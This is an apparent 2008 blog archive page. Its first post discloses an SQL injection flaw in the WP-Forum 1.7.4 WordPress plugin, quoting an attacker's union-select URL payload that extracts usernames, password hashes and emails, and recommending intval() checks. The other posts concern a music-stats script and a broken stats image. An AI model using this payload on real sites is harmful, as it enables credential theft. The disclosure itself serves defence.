Archive for January, 2008

WP-Forum XSS and SQL Injection vulnerabilities

Tuesday, January 29th, 2008 by admin

So some twit (or bot) attempted an SQL attack against our site. SQL Injection is a form of code injection. There are many types of code injection. The definition of XSS includes SQL Injection as one of the methods.

This one used a crafty query in an attempt to gain access to records from our databases.

http://asylum-et.com/?page_id=3&forumaction=showprofile

&user=1%20union%20select%20null,
concat(user_login,0x2f,user_pass,0x2f,user_email),
null,null,null,null,null%20from%20wp_users%20where%20id=1/*

which output this nice little bit:

WordPress database error: [The used SELECT statements have a different number of columns]
SELECT count(*) FROM wp_forum_posts WHERE author_id = 1 union select null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null from wp_users where id=1/*

WordPress database error: [The used SELECT statements have a different number of columns]
SELECT * FROM wp_forum_posts WHERE author_id = 1 union select null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null from wp_users where id=1/* ORDER BY date DESC LIMIT 10

Unfortunately for this person, this is not the result they were after, since our database is not the standard WP database and the code is not the standard WP code, but I have fixed the code so that not even this is output any more.

Please take note of this twit's IP address.
88-232-152-90

I am glad that this attempt has been made because it alerted us to a vulnerability in the wp-forum Version: 1.7.4 software. The author must have decided that sanity checks were useless because there was not a single one checking the data being passed for database queries.

If you are using this plugin you should at least go through and do an intval() on each of the $_GET variables that wp-forum has accessed directly in the queries. Hopefully the author decides to release a security fix for their software, but that won't affect us since we have extensively altered our script to secure it. The original wp-forum can be found here: http://www.fahlstad.se/wp-plugins/wp-forum

MusikCube Now Playing PHP Script

Friday, January 18th, 2008 by admin

We have just added a new download for everyone: a PHP script that updates your website with your listening statistics and then gives an example of how to output the information on your website to show your most recently played tracks, without the need for a 3rd party.
MusikCube Now Playing Script

Is browser report dead?

Friday, January 11th, 2008 by admin

I noticed about a week or two ago that the http://browserreport.com image for tracking browser statistics has been broken. Did not think too much of it, just figured the server was under high load or whatever. So I stopped over to their site the other day to check it out and maybe find out what the problem was. I found that when trying to access the image directly I see a PHP error that says the image create function that was being used was undefined. This means either they moved to a new server and this extension is not enabled in PHP, or that their host disabled it, or something to that effect. At first I figured it was just a little boo boo. Nope, still no change.

What had made me decide to even try to access the image directly was that the captcha for their comment form was not working, and so I had to investigate that. Anyway, we have no way of contacting them through their website to inform them, and it seems evident from viewing the stats: they went from Firefox maxing the charts out on a steady course to all of a sudden a mass swoop of IE, as if every IE lover decided to load up their IE with an auto refresher/reloader and the server's admins decided to kill it.

Anyway, we have removed the image, at least for now, until they are up and running again, so our performance is not degraded by trying to access this dead image. We will leave any links on our site to them since we have hung in with them for some time now. Good luck over there guys, and hope to see you up and running again soon.